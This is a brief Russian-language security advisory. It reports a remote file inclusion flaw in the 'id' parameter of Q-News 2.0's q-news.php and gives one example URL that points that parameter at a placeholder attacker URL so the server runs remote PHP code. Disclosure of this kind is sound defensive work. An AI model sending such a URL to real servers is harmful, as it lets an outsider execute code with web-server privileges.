Программа: Q-News 2.0, возможно белее ранние версии
Уязвимость позволяет удаленному пользователю выполнить произвольные команды на
целевой системе. Уязвимость обнаружена при обработке входных данных в параметре
"id" сценария "q-news.php". Удаленный пользователь может с помощью специально
сформированного URL выполнить произвольный PHP сценарий на целевой системе с
привилегиями web сервера.
Пример:
http://[target]/path_to_qnews/q-news.php?id=http://[attacker_url]
